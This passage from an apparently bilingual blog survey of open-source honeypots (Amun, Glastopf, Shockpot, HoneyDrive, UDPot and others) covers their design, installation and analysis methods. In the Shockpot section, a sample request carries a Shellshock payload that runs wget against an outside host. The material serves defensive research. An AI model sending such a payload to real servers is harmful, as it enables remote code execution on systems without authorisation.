results of the vulnerability module that successfully emulated a service and obtained the exploit payload from the attacker. This payload is passed on to the Shellcode Analyzer to detect any known shellcode. The results of the Shellcode Analyzer are again returned to the Request Handler, thus the Request Handler is the crucial point for any attack.
4. Vulnerability Modules
The vulnerability modules make up the emulated services which lure autonomous spreading malware. Each module represents a different service, for example a FTP server. The services are emulated only to the degree that isneededtotriggeracertainexploit. Thatmeans,theemulated services cannot be regularly used, i.e. they do not offer the full functionality of the original service.
从这个角度来说,amun是一个漏洞导向的honypot,而不是一个低交互/高交互的honypot
Vulnerabilities are realized as finite state machines,They usually consist of several stages that lead through the emulated service.
That means, each incoming network packet of an attacker is matched against the next state of the finite state machine. Ifitmatches,thestateofthevulnerbilitymoduleswitches to the next stage, otherwise the vulnerabilitiy module rejects the incoming request. That way Amun assures that only requests that lead to the exploit of the emulated serviceareaccepted. Alldatathatleadstoanundefinedstate is logged by the Request Handler.
5. Shellcode Analyzer
In case a vulnerability module successfully emulated a service to the point where the attacker sends exploit code, all incoming datais recorded and finally transferred to the Shellcode Analyzer. The Shellcode Analyzer is the backbone of Amun, as it is responsible for shellcode recognition and decoding. Shellcode is recognized using several regular expression that match known parts of shellcode. In most cases this is the decoder part,a small loop that decodes the obfuscated shellcode back to its original
6. Download Modules
As described in the previous section the Shellcode Analyzer extracts the commands from the shellcode. These commands end up to be some kind of download method to get the actual malware, e.g. the worm binary. As the goal of Amun is to capture autonomously spreadingmalware,wewanttogetholdofanyadvertised binary file, thus we need Amun to be able to handle different kinds of download methods. For each download method we can provide a module that is loaded upon the start of the honeypot. Amun currently provides four basic download modules, namely
1. HTTP 2. FTP 3. TFTP 4. direct download.
7. Submission Modules
Once a file has been downloaded using any of the above mentioned download modules it needs to be processed further. That means it can be stored to harddisc for example, or send to a remote service. In the default configuration Amun only loads the submit-md5 module. This modules stores each downloaded binary to a certain folder on the harddrive. As a filename it uses the MD5 hash of the content of the file.
Relevant Link:
https://ub-madoc.bib.uni-mannheim.de/2595/1/amunhoneypot2.pdf http://subs.emis.de/LNI/Proceedings/Proceedings170/177.pdf https://sourceforge.net/projects/amunhoney/
6. Glastopf web honeypot
Glastopf is a Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications.
Glastopf的核心策略不是100%模拟一个高交互的WEB系统,它的目标是针对自动化漏洞扫描/利用工具,通过对漏洞利用方式进行归类,整体都某一类的利用方式返回对应的合理结果,以此实现低交互的目的
0x1: 总体架构图
0x2: Remote File Inclusion
This attack principle is very easy: Include the malicious file in vulnerable code in the web application and have it run on the compromised web server. Most of the time the attacker expects some kind of feedback from his code if the injection has been successful. And that's where we get involved.
0x3: Local File Inclusion
Another handled attack type is Local File Inclusion. In this type of approach, the attacker tries to use a vulnerability to obtain security critical system information or to execute previously injected code. If the attacker tries to include system files like passwd or shadow, Glastopf replies with a dynamically generated file, similar to the requested one, to provoke and encourage further
attacks. If Glastopf is unable to categorize the attack, it is merely logged in our database. An exception are requests on the web server root folder and index.* requests.
0x4: General approach
1. Vulnerability type emulation instead of vulnerability emulation. Once a vulnerability type is emulated, Glastopf can handle unknown attacks of the same type. While implementation may be slower and more complicated, we remain ahead of the attackers until they come up with a new method or discover a new flaw in our implementation. 2. Modular design to add new logging capabilities or attack type handlers. Various database capabilities are already in place. HPFeeds logging is supported for centralized data collection. 3. Popular attack type emulation is already in place: Remote File Inclusion via a build-in PHP sandbox, Local File Inclusion providing files from a virtual file system and HTML injection via POST requests. 4. Adversaries usually use search engines and special crafted search requests to find their victims. In order to attract them, Glastopf provides those keywords (AKA "dork") and additionally extracts them from requests, extending its attack surface automatically. As a result, the honeypot gets more and more attractive with each new attack attempted on it. 5. make the SQL injection emulator public, provide IP profiling for crawler recognition and intelligent dork selection.
0x5: INSTALL
1. Prerequisites
sudo apt-get update sudo apt-get -y install python2.7 python-openssl python-gevent libevent-dev python2.7-dev build-essential make sudo apt-get -y install python-chardet python-requests python-sqlalchemy python-lxml sudo apt-get -y install python-beautifulsoup mongodb python-pip python-dev python-setuptools sudo apt-get -y install g++ git php5 php5-dev liblapack-dev gfortran libmysqlclient-dev sudo apt-get -y install libxml2-dev libxslt-dev sudo pip install --upgrade distribute
2. Install and configure the PHP sandbox
cd /opt sudo git clone git://github.com/mushorg/BFR.git cd BFR sudo phpize sudo ./configure --enable-bfr sudo make && sudo make install
Open the php.ini file and add bfr.so accordingly to the build output:
vim /etc/php5/cli/php.ini zend_extension = /usr/lib/php5/20121212/bfr.so
3. Install glastopf
//如果遇到: NameError: name 'sys_platform' is not defined rm -rf /usr/local/lib/python2.7/dist-packages/distribute-0.7.3-py2.7.egg-info/ rm -rf /usr/local/lib/python2.7/dist-packages/setuptools* //如果遇到: E: Unable to locate package python-logstash pip install python-logstash maybe install distribute manually: wget https://pypi.python.org/packages/source/d/distribute/distribute-0.6.35.tar.gz tar -xzvf distribute-0.6.35.tar.gz cd distribute-0.6.35 python setup.py install //安装过程中遇到python库的缺失 pip install MarkupSafe //如果: sudo pip install glastopf安装失败 cd /opt sudo git clone https://github.com/mushorg/glastopf.git cd glastopf sudo python setup.py install
4. Configuration
cd /opt
sudo mkdir myhoneypot
cd myhoneypot
sudo glastopf-runner
A new default glastopf.cfg has been created in myhoneypot, which can be customized as required.
vim glastopf.cfg [hpfeed] enabled = false
db/glastopf.db保存了WEB交互的所有原始数据,是一个本地sqlite文件
Relevant Link:
http://glastopf.org/ http://honeynet.org/papers/KYT_glastopf http://honeynet.org/sites/default/files/files/KYT-Glastopf-Final_v1.pdf https://github.com/mushorg/BFR https://github.com/mushorg/glastopf
7. Wordpot
Wordpot is a Wordpress honeypot which detects probes for plugins, themes, timthumb and other common files used to fingerprint a wordpress installation.
Relevant Link:
https://github.com/gbrindisi/wordpot
8. Conpot SCADA/ICS honeypot
Conpot is an ICS honeypot with the goal to collect intelligence about the motives and methods of adversaries targeting industrial control systems
Relevant Link:
https://www.honeynet.org/node/1047 https://github.com/mushorg/conpot https://www.honeynet.org/taxonomy/term/304
9. phoneyc
PhoneyC is a virtual client honeypot, meaning it is not a real application but rather an emulated client. By using dynamic analysis, PhoneyC is able to remove the obfuscation from many malicious pages. Furthermore, PhoneyC emulates specific vulnerabilities to pinpoint the attack vector. PhoneyC is a modular framework that enables the study of malicious HTTP pages and understands modern vulnerabilities and attacker techniques.
Relevant Link:
https://github.com/honeynet/phoneyc https://code.google.com/archive/p/phoneyc/ http://citeseer.ist.psu.edu/viewdoc/summary;jsessionid=E30296F5A6B4C85ABBB46C3429974791?doi=10.1.1.148.5317 https://www.usenix.org/legacy/event/leet09/tech/full_papers/nazario/nazario.pdf https://honeynet.org/project/PhoneyC
10. shockpot
Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271.
0x1: Installation
git clone https://github.com/threatstream/shockpot.git cd shockpot apt-get install python-virtualenv virtualenv env . env/bin/activate pip install -r requirements.txt //下载bottle框架主文件 wget https://github.com/bottlepy/bottle/raw/master/bottle.py
0x2: Configuration
vim shockpot.conf [server] host = 0.0.0.0 port = 8080 [headers] server = Apache/2.0.55 (Debian) PHP/5.1.2-1+b1 mod_ssl/2.0.55 OpenSSL/0.9.8b [hpfeeds] enabled = false host = 127.0.0.1 port = 10000 identity = shockpot secret = secret channel = shockpot.events only_exploits = True [fetch_public_ip] enabled = True urls = ["http://www.telize.com/ip", "http://queryip.net/ip/", "http://ifconfig.me/ip"] # put any variables in here that you want to render in your template.html. [template] title = It Works!
0x3: Running
python shockpot.py
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1 Host: help.tenpay.com User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php Accept: */* Referer: http://www.baidu.com Connection: keep-alive
Relevant Link:
http://blog.csdn.net/jiayanhui2877/article/details/39584003 http://blog.csdn.net/huithe/article/details/8087645 https://pypi.python.org/pypi/bottle/0.12.9 https://github.com/bottlepy/bottle https://github.com/threatstream/shockpot
11. MHN(Modern Honey Network)
From the secure deployment to the aggregation of thousands of events MHN provides enteprise grade management of the most current open source honeypot software. MHN is completely free open source software which supports external and internal honeypot deployments at a large and distributed scale
Relevant Link:
http://drops.wooyun.org/papers/5968 http://threatstream.github.io/mhn/
12. Database Honeypots
Relevant Link:
1. Elastic honey - A Simple Elasticsearch Honeypot https://github.com/jordan-wright/elastichoney 2. mysql - A mysql honeypot https://github.com/schmalle/MysqlPot 3. NoSQLpot - The NoSQL Honeypot Framework. https://github.com/torque59/nosqlpot 4. ESPot - ElasticSearch Honeypot https://github.com/mycert/ESPot
13. awesome-honeypots
https://github.com/paralax/awesome-honeypots
14. Honey Drive
HoneyDrive是一款Linux蜜罐系统,它是以虚拟设备(OVA)的方式安装在Xubuntu 12.04.4版本上面。HoneyDrive系统里面包含了10款预装和预配置的蜜罐软件,如
1. Kippo SSH honeypot 2. Dionaea 3. Amun malware honeypots 4. Honeyd low-interaction honeypot 5. Glastopf web honeypot 6. Wordpot 7. Conpot SCADA/ICS honeypot 8. Thug 9. PhoneyC honeyclients等
系统还提供了一些脚本和工具来分析数据,并且数据通过可视化的方式呈现。如Kippo-Graph, Honeyd-Viz, DionaeaF和ELK stack等
0x1: 特点
1. 基于Xubuntu 12.04.4 LTS虚拟设备 2. 预安装LAMP(Apache 2, MySQL 5),还有其他的一些管理工具,如phpMyAdmin 3. Kippo SSH蜜罐,加上Kippo-Graph, Kippo-Malware, Kippo2MySQL和其他一些脚本 4. Dionaea蜜罐,配套DionaeaFR和脚本 5. Amun蜜罐和脚本 6. Glastopf Web蜜罐和Wordpot WordPress蜜罐 7. Conpot SCADA/ICS蜜罐 8. Honeyd低交互蜜罐等等 //取证与分析工具、网络监控、PDF分析等,如 1. ntop 2. p0f 3. EtherApe 4. nmap 5. DFF 6. Wireshark 7. Recon-ng 8. ClamAV 9. ettercap 10. MASTIFF 11. Automater 12. UPX 13. pdftk 14. Flasm 15. Yara 16. Viper 17. pdf-parser 18. Pyew 19. Radare2 20. dex2jar等
Relevant Link:
http://bruteforce.gr/honeydrive http://www.freebuf.com/tools/40865.html
15. Dockpot
Dockpot is a high interaction SSH honeypot based on Docker. It's basically a NAT device that has the ability to act as an SSH proxy between the attacker and the honeypot (Docker container in that case) and logs the attacker's activities. It will create a new docker container for the first connection it gets, NAT the SSH connections to it, destroy the container when the number of the connections to it is zero.
0x1: Install
apt-get install docker curl -sSL https://get.docker.com/ > installdocker.sh sh ./installdocker.sh git clone https://github.com/aabed/dockpot.git cd dockpot ./honsshctrl.sh START
Relevant Link:
https://github.com/aabed/dockpot
16. SSDP Honeypot
16. 我们该怎么利用蜜罐系统进行入侵分析
我觉得我们对于蜜罐的研究有几个点是可以重要去进行深入的
1) 蜜罐怎么提供更好的交互性、是否考虑在真实的原始系统基础上进行旁路,提取我们需要的数据,即依托于真实系统的高交互蜜罐 2) 完全利用虚拟机进行模拟服务,完全架设出一个虚拟的环境,这种情况下安全性是最可控的,但同时对shellcode虚拟执行、命令虚拟执行、系统调用虚拟执行、甚至CPU指令虚拟执行等虚拟化 技术需要较高的支持,这方面已经有很多开源项目在进行了,有很多x86下的虚拟沙箱提供了很好的模拟特性 3) 怎么将安全人员的对抗经验固化到数据建模上,我们在捕获到尽可能多的入侵轨迹数据的同时,还要思考的一个重要问题是怎么对这些数据进行多维度的建模、分析。数据本身是没有意义的, 只有我们安全人员将它们赋予了一定的意义,通过多维度的重组后,数据才会以一种模式、趋势的形式展现出背后的含义,这是入侵分析、对抗中最重要的 4) 将分布式蜜罐技术和云计算、大数据结合起来。在云模式下,部署分布式蜜罐的基本条件已经天然完成了,安全人员不需要专门去架设专用蜜罐系统,云平台本身就可以充当一个入侵、攻击轨迹
数据的来源,即大数据分析。我们要做的就是怎么更有效地分析这些数据。要做到这点,还是需要理论和实践的结合,以安全人员的经验为基础,同时依托相应的理论建立相应的分析模型
以下内容来自 http://www.keyfocus.net/,它们的分析维度我觉得很有启发性
http://tech.sina.com.cn/s/2008-09-01/2301789129.shtml
EVENT方面 1. start time: 行为开始时间 2. end time: 行为停止时间 3. event ID: 事件ID 4. TYPE: 连接方式 5. DISCSRIPTION: 事件详细描述 6. SERVERITY: 事件激烈程度 VISITOR方面 1. IP: 入侵者IP 2. PORT: 入侵者使用的端口 3. DOMAIN: 入侵者机器名 SENSOR方面 1. IP: 探测器使用者IP 2. PORT: 探测器被入侵端口 3. BOUND: 探测器所绑定的IP 4. PROTOCOL: 协议类型 5. ACTION: 探测器对此事件所做出的行为 6. SIM SERVER: 简明(预设置)的SERVER BANNER DETAILS方面 1. CLOSED BY: 最后是由哪一方关闭此次连接的 2. Limit Exceeded: 超出流量描述 3. RECEIVED: 从入侵者发出,由探测器接收到的数据 4. RESPONSE: 从探测器发出,由入侵者接收到的数据 5. "EXPAND"按钮: 展开(展开后可以选择多种显示格式,在'FORMAT'栏上可以选择) 6. "NEXT"按钮: 下一个ID的事件详细情况 7. "PREVIOUS"按钮: 前一个ID的事件详细情况
诸葛建伟的研究论文中也提到了很多很有启发意义的分析维度
威胁数据分析方法
1. 最基础的威胁数据分析机制为实证分析, 即通过对实验采集数据进行统计汇总,揭示出安全威胁的基本统计特性以更好地理解互联网上的"攻击策略"与"工具" 2. 可视化分析技术可以进一步对蜜罐捕获的安全威胁数据进行2D 图形化与3D 动画效果展示,以非常直观的方式将威胁数据展示给安全研究人员,使其快速理解捕获安全威胁的整体态势,并发现其
中可能包含的异常事件
(这点我觉得就是DionaeaFR的目标) 3. 更进一步的威胁数据分析方法能够解释出捕获数据背后的根源。采用PCA(principal component analysis)方法从Leurré.com 分布式蜜罐系统数据提取出潜在的"攻击行为聚类", 并进
行"归因分析" 4. 基于"攻击时序相似性"的聚类方法, 从蜜网数据中发现普遍的攻击模式 5. 应用了"关联分析方法", 在安全知识库的支持下,该方法能够从蜜网捕获安全威胁数据中识别出"攻击规划", 并重构出攻击过程场景,从而有助于安全研究人员更好地发现和理解捕获数据中蕴
含的"攻击场景"
(这里的安全知识库,我觉得就是一种将安全工程师的入侵分析经验的固化,将经验模式化为一些类正则代码,从而更好地进行模式匹配)
17. Detecting Honeypots(反检测-蜜罐检测技术)
Although honeypots are a great resource for investigating adversaries or automatic exploitation via worms, the amount of information we can learn depends on how realistic the honeypots are. If an adversary breaks into a machine and immediately notices that she broke into a honeypot, her reaction might be to remove all evidence and leave the machine alone. On the other hand, if the fact that she broke into a honeypot remains undetected, she could use it to store attack tools and launch further attacks on other systems. This makes it very important to provide realistic-looking honeypots. For low-interaction honeypots, it is important to deceive network scanning tools and for high-interaction honeypots, the whole operating system environment has to look very real. This is not a problem for a physical high-interaction honeypots, but for a system running under a virtual machine, it becomes more difficult to hide its nature.
0x1: Detecting Low-Interaction Honeypots
0x2: Detecting High-Interaction Honeypots
0x3: Detecting Rootkits
Relevant Link:
http://books.gigatux.nl/mirror/honeypot/final/ch09lev1sec1.html https://github.com/a0rtega/pafish
18. DNS Honeypot
0x1: UDPot
git clone https://github.com/jekil/UDPot.git cd UDPot pip install -r requirements.txt pip install twisted python dns.py -h usage: dns.py [-h] [-p DNS_PORT] [-c REQ_COUNT] [-t REQ_TIMEOUT] [-s] [-v] server positional arguments: server: DNS server IP address optional arguments: -h, --help: show this help message and exit -p DNS_PORT, --dns-port DNS_PORT: DNS honeypot port -c REQ_COUNT, --req-count REQ_COUNT: how many request to resolve -t REQ_TIMEOUT, --req-timeout REQ_TIMEOUT: how many request to resolve -s, --sql: database connection string -v, --verbose: print each request
You can run the DNS honeypot with the following command, you have to add the IP of the DNS server you use to resolve the first bunch of queries to seems like an open resolver (in this example we use 8.8.8.8):
python dns.py 8.8.8.8 -v -p 53
Now your DNS honeypot is listening on both port 5053 UDP and TCP. If you want to bind it to port 53 you have to:
1. run it as root and use option -p which is really not recommended 2. add an iptables rule to redirect traffic from port 53 to port 5053
Example iptables rules to redirect traffic:
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 53 -j REDIRECT --to-ports 5053 iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --to-ports 5053
Some other arguments are optional:
-p is used to bind DNS honeypot service on a given port -c how many requests should be resolved (sending a DNS reply) like a real open resolver -t timeout to re-start resolving requests (sending a DNS reply) like a real open resolver -s choose a SQL database (default SQLite) -v verbose logging (prints each request)
Relevant Link:
https://github.com/jekil/UDPot
Copyright (c) 2016 LittleHann All rights reserved
